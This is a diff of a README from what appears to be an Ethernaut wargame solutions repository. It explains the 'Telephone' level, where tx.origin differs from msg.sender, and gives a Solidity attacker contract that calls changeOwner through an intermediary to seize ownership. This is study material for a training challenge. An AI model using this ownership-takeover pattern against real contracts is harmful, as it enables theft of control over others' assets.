AIT-S/Ethernaut-Solutions/README.md

 ```

 ## 4. Telephone
-Don't rely on tx.origin.
-Remember that when you call a contract (B) function from within another contract (A), the msg.sender is the address of A, not the account that you initiated the function from.
-The only way you can preserve msg.sender is through DelegateCall but that's another shit show by itself!
-Would avoid unless you know what you're doing.
+When you call a contract (A) function from within another contract (B), the msg.sender is the address of B, not the account that you initiated the function from.
 ```
-pragma solidity ^0.4.24;
+pragma solidity ^0.6.0;
-import "./telephone.sol";

-contract HackIt {
+contract AttackTelephone {
-    Telephone private telephone;
+    address public telephone;

-    constructor(address _address) public {
+    constructor(address _telephone) public {
-        telephone = Telephone(_address);
+        telephone = _telephone;
     }

-    function hackIt() public {
+    function changeBadOwner(address badOwner) public {
-        telephone.changeOwner(msg.sender);
+        bytes memory payload = abi.encodeWithSignature("changeOwner(address)", badOwner);
+        (bool success, ) = telephone.call(payload);
+        require(success, "Transaction call using encodeWithSignature is successful");
     }
 }
 ```